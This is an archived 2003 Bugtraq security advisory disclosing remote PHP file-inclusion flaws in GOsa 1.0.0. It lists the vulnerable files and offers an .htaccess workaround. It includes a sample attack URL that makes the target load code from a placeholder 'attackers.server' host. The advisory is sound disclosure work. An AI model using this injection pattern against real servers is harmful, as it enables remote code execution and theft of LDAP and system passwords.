GOnicus System Administrator php injection

From: Karol Wiesek (appelast@bsquad.sm.pl)
Date: 02/24/03

  • Next message: Michael Jennings: "Re: Terminal Emulator Security Issues"
    Date: Mon, 24 Feb 2003 17:44:19 +0100
    From: Karol Wiesek <appelast@bsquad.sm.pl>
    To: bugtraq@securityfocus.com
    
    

    I. BACKGROUND

    The GOnicus System Administrator is a PHP based administration tool
    for managing accounts/systems in LDAP databases.

    Project homepage : http://www.gonicus.de

    II. DESCRIPTION

    A remote attacker can inject into GOsa arbitrary PHP code
    that executes under the privileges of the underlying web server.
    There are serveral places, where by modifying several variables
    attacker could execute arbitrary PHP code.

    By setting plugin variable in following files attacker could
    include remote files and execute them as a PHP code :

    plugins/3fax/1blocklists/index.php
    plugins/2administration/6departamentadmin/index.php
    plugins/2administration/5terminals/index.php
    plugins/2administration/4mailinglists/index.php
    plugins/2administration/3departaments/index.php
    plugins/2administration/2groupd/index.php

    The same situation exists in include/help.php where we could
    set base variable as a remote host and include remote file.

    The following is a sample attack URL that would cause
    "target.server" to load include/common.inc from
    "attackers.server".

    http://target.server/include/help.php?base=http://attackers.server/

    GOsa doesnt' support "register_globals off".

    III. ANALYSIS

    Remote exploitation allows an attacker to execute arbitrary
    commands and code under the privileges of the web server. This also
    opens the door to privilege escalation attacks. Attacker could also
    debug httpd child processes and grab secret information like users
    system passwords, LDAP passwords.

    IV. DETECTION

    GOsa version 1.0.0 ( current ) is confirmed vulnerable.

    V. Workaround

    Temporary solution is to enable apache .htaccess authentication
    in all subdirectories containing .php files, which are included, not
    accessed directly.

    Example .htaccess file

    AuthType Basic
    AuthName koza
    AuthUserFile /dev/null
    require valid-user

    Karol Wiesek [appelast-at-bsquad.sm.pl]